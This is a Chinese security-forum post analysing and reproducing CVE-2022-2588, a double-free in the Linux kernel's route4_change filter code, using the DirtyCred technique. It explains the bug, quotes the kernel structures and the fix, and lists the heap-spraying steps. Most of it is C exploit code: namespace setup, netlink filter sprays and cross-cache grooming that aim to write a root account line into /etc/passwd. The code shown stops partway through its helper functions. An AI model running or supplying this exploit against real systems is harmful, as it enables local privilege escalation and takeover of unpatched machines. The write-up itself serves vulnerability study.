首页
社区
课程
招聘
[原创]CVE-2022-2588 Dirty Cred漏洞分析与复现
发表于: 2024-3-1 19:12 12454

[原创]CVE-2022-2588 Dirty Cred漏洞分析与复现

2024-3-1 19:12
12454

漏洞函数是 route4_change(),用于初始化和替换 route4_filter 对象。使用 handle 作为id来区分不同的 route4_filter,如果存在某个 handle 之前已被初始化过(fold 变量非空),就会移除旧的 filter,添加新的 filter;否则直接添加新的 filter

由于将 route4_filter 对象从链表中删除和释放时的检查条件不一致,导致该对象被释放后仍存于链表中,后面可以触发 Double Free,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。

影响Linux Kernel版本:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9ad36309e2719a884f946678e0296be10f

安装 Kernel:

编译选项:

Kernel 凭证是 kernel 文档中定义的 kernel 中携带特权信息的特征,表示权限和对应的能力,主要分为:

众所周知,Linux 内核主要使用 slab 分配器来进行内存分配,slab 分配器中主要维护了两种内存缓存(即可以理解成两套作用不同的内存分配方式):

这类 credfile 结构体等 credential 对象都是在 dedicated cache 中分配,而大多数内存漏洞发生的地方都是在 generic cache

使用 sudo cat /proc/slabinfo 可以查看 slab 分配器的具体信息

漏洞点

大致步骤:

具体步骤:(本例是采用 file 对象完成利用,也可以采用 cred 对象)

一般就是如下三种方式:

由于 credential 的替换需要一些时间,因此如果能延长这个竞争窗口,那就能非常成功的进行漏洞利用,其中 Userfaultfd 和 FUSE,这两种机制都允许用户无限延长竞争窗口

由于 Dirty Cred 十分需要控制 privilege credential 对象的分配时机,控制该对象的分配成为了一个关键点

用户层中:

内核层中,当内核创建新的 kernel thread 时,当前 kernel thread 将会被复制,这时其 privileged cred 结构体也会被拷贝一份

有两种方法可以做到这点:

这里可以发现,将 route4_filter 对象从链表中删除和释放时的检查条件不一致:

如果 old handle == 0,则不会在链表中删除但是会被释放,这就导致了一个 UAF

cross-cache:我们将释放某个 kmalloc-256 cache page,将该页归还给页管理器,然后分配 file 结构来复用该页(filp cache

借用其他师傅的表

对应 exp 如下:

结果如下:

参考文章:

CVE-2022-2588 Double-free 漏洞 DirtyCred 利用

浅析 Linux Dirty Cred 新型漏洞利用方式

wget <https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz>
tar -xvf linux-5.19.1.tar.xz
make menuconfig
make x86_64_defconfig
make bzImage -j32
wget <https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz>
tar -xvf linux-5.19.1.tar.xz
make menuconfig
make x86_64_defconfig
make bzImage -j32
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key  *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu;            /* Can we skip RCU deletion? */
        struct rcu_head rcu;        /* RCU deletion hook */
    };
} __randomize_layout;
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key  *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu;            /* Can we skip RCU deletion? */
        struct rcu_head rcu;        /* RCU deletion hook */
    };
} __randomize_layout;
struct file {
    union {
        struct llist_node   fu_llist;
        struct rcu_head     fu_rcuhead;
    } f_u;
    struct path     f_path;
    struct inode        *f_inode;   /* cached value */
    const struct file_operations    *f_op;
 
    /*
     * Protects f_ep_links, f_flags.
     * Must not be taken from IRQ context.
     */
    spinlock_t      f_lock;
    enum rw_hint        f_write_hint;
    atomic_long_t       f_count;
    unsigned int        f_flags;
    fmode_t         f_mode;
    struct mutex        f_pos_lock;
    loff_t          f_pos;
    struct fown_struct  f_owner;
    const struct cred   *f_cred;
    struct file_ra_state    f_ra;
 
    u64         f_version;
#ifdef CONFIG_SECURITY
    void            *f_security;
#endif
    /* needed for tty driver, and maybe others */
    void            *private_data;
 
#ifdef CONFIG_EPOLL
    /* Used by fs/eventpoll.c to link all the hooks to this file */
    struct list_head    f_ep_links;
    struct list_head    f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
    struct address_space    *f_mapping;
    errseq_t        f_wb_err;
    errseq_t        f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));  /* lest something weird decides that 2 is OK */
 
struct file_handle {
    __u32 handle_bytes;
    int handle_type;
    /* file identifier */
    unsigned char f_handle[];
};
struct file {
    union {
        struct llist_node   fu_llist;
        struct rcu_head     fu_rcuhead;
    } f_u;
    struct path     f_path;
    struct inode        *f_inode;   /* cached value */
    const struct file_operations    *f_op;
 
    /*
     * Protects f_ep_links, f_flags.
     * Must not be taken from IRQ context.
     */
    spinlock_t      f_lock;
    enum rw_hint        f_write_hint;
    atomic_long_t       f_count;
    unsigned int        f_flags;
    fmode_t         f_mode;
    struct mutex        f_pos_lock;
    loff_t          f_pos;
    struct fown_struct  f_owner;
    const struct cred   *f_cred;
    struct file_ra_state    f_ra;
 
    u64         f_version;
#ifdef CONFIG_SECURITY
    void            *f_security;
#endif
    /* needed for tty driver, and maybe others */
    void            *private_data;
 
#ifdef CONFIG_EPOLL
    /* Used by fs/eventpoll.c to link all the hooks to this file */
    struct list_head    f_ep_links;
    struct list_head    f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
    struct address_space    *f_mapping;
    errseq_t        f_wb_err;
    errseq_t        f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));  /* lest something weird decides that 2 is OK */
 
struct file_handle {
    __u32 handle_bytes;
    int handle_type;
    /* file identifier */
    unsigned char f_handle[];
};
struct route4_filter {
    struct route4_filter __rcu  *next;
    u32         id;
    int         iif;
 
    struct tcf_result   res;
    struct tcf_exts     exts;
    u32         handle;
    struct route4_bucket    *bkt;
    struct tcf_proto    *tp;
    struct rcu_work     rwork;
};
struct route4_filter {
    struct route4_filter __rcu  *next;
    u32         id;
    int         iif;
 
    struct tcf_result   res;
    struct tcf_exts     exts;
    u32         handle;
    struct route4_bucket    *bkt;
    struct tcf_proto    *tp;
    struct rcu_work     rwork;
};
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
    __u32   type; /* for backward compat(TCA_OLD_COMPAT) */
    int nr_actions;
    struct tc_action **actions;
    struct net *net;
#endif
    /* Map to export classifier specific extension TLV types to the
     * generic extensions API. Unsupported extensions must be set to 0.
     */
    int action;
    int police;
};
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
    __u32   type; /* for backward compat(TCA_OLD_COMPAT) */
    int nr_actions;
    struct tc_action **actions;
    struct net *net;
#endif
    /* Map to export classifier specific extension TLV types to the
     * generic extensions API. Unsupported extensions must be set to 0.
     */
    int action;
    int police;
};
static int route4_change(struct net *net, struct sk_buff *in_skb,
             struct tcf_proto *tp, unsigned long base, u32 handle,
             struct nlattr **tca, void **arg, bool ovr,
             bool rtnl_held, struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;
 
    if (opt == NULL)
        return handle ? -EINVAL : 0;
 
    err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
                      route4_policy, NULL);
    if (err < 0)
        return err;
 
    fold = *arg; /* 现有的route4_filter对象 */
    if (fold && handle && fold->handle != handle)
            return -EINVAL;
 
    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* 分配新的route4_filter对象 */
    if (!f)
        goto errout;
 
    err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* 进行初始化,为route4_filter->exts.action分配256字节的空间 */
    if (err < 0)
        goto errout;
 
    if (fold) { /* 把旧的route4_filter对象中的数据填入新的route4_filter对象 */
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;
 
        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }
 
    err = route4_set_parms(net, tp, base, f, handle, head, tb,
                   tca[TCA_RATE], new, ovr, extack); /* 初始化new filter */
    if (err < 0)
        goto errout;
 
    /* 将new filter插入到list */
    h = from_hash(f->handle >> 16);
    fp = &f->bkt->ht[h];
    for (pfp = rtnl_dereference(*fp);
         (f1 = rtnl_dereference(*fp)) != NULL;
         fp = &f1->next)
        if (f->handle < f1->handle)
            break;
 
    tcf_block_netif_keep_dst(tp->chain->block);
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
    /* 若存在old filter,old handle不为"0",old new handle不同,则从list中移除 */
    if (fold && fold->handle && f->handle != fold->handle) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h]; /* ht存放的是route4_filter列表 */
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next); /* 从链表中删除 */
                    break;
                }
            }
        }
    }
 
    route4_reset_fastmap(head);
    *arg = f;
    if (fold) { /* 若存在old filter,释放old filter */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* 启动内核任务,调用route4_delete_filter_work释放old filter */
    }
    return 0;
 
errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
static int route4_change(struct net *net, struct sk_buff *in_skb,
             struct tcf_proto *tp, unsigned long base, u32 handle,
             struct nlattr **tca, void **arg, bool ovr,
             bool rtnl_held, struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;
 
    if (opt == NULL)
        return handle ? -EINVAL : 0;
 
    err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
                      route4_policy, NULL);
    if (err < 0)
        return err;
 
    fold = *arg; /* 现有的route4_filter对象 */
    if (fold && handle && fold->handle != handle)
            return -EINVAL;
 
    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* 分配新的route4_filter对象 */
    if (!f)
        goto errout;
 
    err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* 进行初始化,为route4_filter->exts.action分配256字节的空间 */
    if (err < 0)
        goto errout;
 
    if (fold) { /* 把旧的route4_filter对象中的数据填入新的route4_filter对象 */
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;
 
        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }
 
    err = route4_set_parms(net, tp, base, f, handle, head, tb,
                   tca[TCA_RATE], new, ovr, extack); /* 初始化new filter */
    if (err < 0)
        goto errout;
 
    /* 将new filter插入到list */
    h = from_hash(f->handle >> 16);
    fp = &f->bkt->ht[h];
    for (pfp = rtnl_dereference(*fp);
         (f1 = rtnl_dereference(*fp)) != NULL;
         fp = &f1->next)
        if (f->handle < f1->handle)
            break;
 
    tcf_block_netif_keep_dst(tp->chain->block);
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
    /* 若存在old filter,old handle不为"0",old new handle不同,则从list中移除 */
    if (fold && fold->handle && f->handle != fold->handle) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h]; /* ht存放的是route4_filter列表 */
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next); /* 从链表中删除 */
                    break;
                }
            }
        }
    }
 
    route4_reset_fastmap(head);
    *arg = f;
    if (fold) { /* 若存在old filter,释放old filter */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* 启动内核任务,调用route4_delete_filter_work释放old filter */
    }
    return 0;
 
errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
-   if (fold && fold->handle && f->handle != fold->handle) {
+   if (fold) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
-   if (fold && fold->handle && f->handle != fold->handle) {
+   if (fold) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
进程1 进程2
0. 绑定到 CPU 0 上运行,设置子进程内存、工作目录、Namespace,启动进程2
1. 去碎片化,打开10000个文件,消耗 filp cache,为 cross-cache 作准备
2. 喷射 (middle+3)*32 kmalloc-192 & kmalloc-256(和漏洞对象位于同一cache,便于进行 cross-cache 被 file 对象复用)
3. 分配1个 route4_filter 漏洞对象,还有1个kmalloc-256 的漏洞对象
4. 再喷射 (end-middle-2)*32 kmalloc-192 & kmalloc-256
5. 释放 (end-24)*32 kmalloc-192 & kmalloc-256
6. 第1次释放漏洞对象 kmalloc-192 & kmalloc-256
7. 释放 (end-middle+1) kmalloc-192 & kmalloc-256(避免连续释放同一对象,触发内核 double-free 的检测)
8. 喷射 4000 个低权限 file 对象(通过打开 exp_dir/data 文件)
9. 第2次释放漏洞对象 kmalloc-192 & kmalloc-256
10. 喷射 5000 个低权限 file 对象,采用 kcmp 调用检查是否和前 4000 个 file 重合,重合的两个 file 记为 overlap_a / overlap_b
11. 发起3个利用线程,线程1写入大量数据来占用文件锁,线程2往 overlap_a 写入恶意数据
12. 线程3关闭 overlap_a / overlap_b,喷射 4096*2 个高权限 file 对象(通过打开 /etc/passwd 文件),未区分CPU
13. 最后检查 /etc/passwd 文件是否被写入恶意数据
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>
 
#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>
 
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>
 
#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>
 
char* target = "/etc/passwd";                   // overwrite the target file
char* overwrite = "hi:x:0:0:root:/:/bin/sh\\\\n"// "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\\\\n"
char* global;
char* self_path;
char* content;                                  // evil data + existing data in the target file
 
#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000
 
int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1;     // unprivileged `file`
int overlap_b = -1;     // privileged `file`
 
int cpu_cores = 0;      // num of cpu cores
int sockfd = -1;
 
int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000
 
int pipe_main[2];       // notify process to excecute using pipe
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];
 
int run_write = 0;      // let thread 2 begin to write evil data
int run_spray = 0;      // let thread 3 begin to spray privileged `file`
bool overlapped = false;
 
void print_hex(char* buf, int size) {
    int i;
    puts("======================================");
    printf("data :\\\\n");
    for (i = 0; i < (size / 8); i++) {
        if (i % 2 == 0) {
            printf("%d", i / 2);
        }
        printf(" %16llx", *(size_t*)(buf + i * 8));
        if (i % 2 == 1) {
            printf("\\\\n");
        }
    }
    puts("======================================");
}
// set cpu affinity
void pin_on_cpu(int cpu) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
        perror("sched_setaffinity()");
        exit(EXIT_FAILURE);
    }
}
 
static bool write_file(const char* file, const char* what, ...) {
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len) {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}
// setup working dir
static void use_temporary_dir(void) {
    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");
    char* tmpdir = "exp_dir";
    if (!tmpdir)
        exit(1);
    if (chmod(tmpdir, 0777))
        exit(1);
    if (chdir(tmpdir))
        exit(1);
    symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    // setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    // RLIMIT_FILE
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {  // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
        rlim.rlim_cur = rlim.rlim_max = 4096;
        spray_num_1 = 1200;
        spray_num_2 = 2800;
        if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
            perror("[-] setrlimit");
            err(1, "[-] setrlimit");
        }
    }
}
 
void setup_namespace() {
    int real_uid = getuid();
    int real_gid = getgid();
 
    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
 
    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
 
    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\\\\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\\\\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}
 
// set up process memory / working dir / namespace
void pre_exploit() {
    adjust_rlimit();
    use_temporary_dir();
    setup_namespace();
}
 
#define NLMSG_TAIL(nmsg)                                                       \\\\
  ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// add attribute
int addattr(char* attr, int type, void* data, int len) {
    struct rtattr* rta = (struct rtattr*)attr;
 
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    if (len)
        memcpy(RTA_DATA(attr), data, len);
 
    return RTA_LENGTH(len);
}
// add attribute (maxlen limitation)
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
    int len = RTA_LENGTH(alen);
    struct rtattr* rta;
 
    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\\\\n", maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}
 
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
    struct rtattr* nest = NLMSG_TAIL(n);
 
    addattr_l(n, maxlen, type, NULL, 0);
    return nest;
}
 
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
    nest->rta_len = (void*)NLMSG_TAIL(n) - (void*)nest;
    return n->nlmsg_len;
}
// add_qdisc() —— setup the socket
int add_qdisc(int fd) {
    char* start = malloc(0x1000);
    memset(start, 0, 0x1000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // new qdisc                                          nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
    // set local
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
 
    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);       // sfq is not defaully configured, only qfq is configured
    // print_hex(msg, msg->nlmsg_len);
 
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    return sendmsg(fd, &msgh, 0);
}
// spray 1 vulnerable object (filter) with customized flags
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
    char* start = malloc(0x2000);
    memset(start, 0, 0x2000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;                               // RTM_NEWTFILTER
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
 
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
 
    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);              // TCA_ROUTE4_FROM
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);                  // TCA_ROUTE4_TO
    addattr_nest_end(msg, tail);
 
    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
 
    sendmsg(fd, &msgh, 0);
    free(start);
    return 1;
}
 
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
    add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}
 
uint32_t calc_handle(uint32_t from, uint32_t to) {
    uint32_t handle = to;
 
    assert(from <= 0xff && to <= 0xff);
    handle |= from << 16;
 
    if (((handle & 0x7f00) | handle) != handle)
        return 0;
 
    if (handle == 0 || (handle & 0x8000))
        return 0;
    return handle;
}
 
void* delete_tc_(int sockfd, u_int32_t handle) {
    char* start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // delete filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;                                   // RTM_DELTFILTER
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
 
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
 
    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);
 
    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
 
    sendmsg(sockfd, &msgh, 0);
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);
 
    if (msgh.msg_namelen != sizeof(nladdr))
        printf("[-] size of sender address is wrong\\\\n");
    return start;
}
 
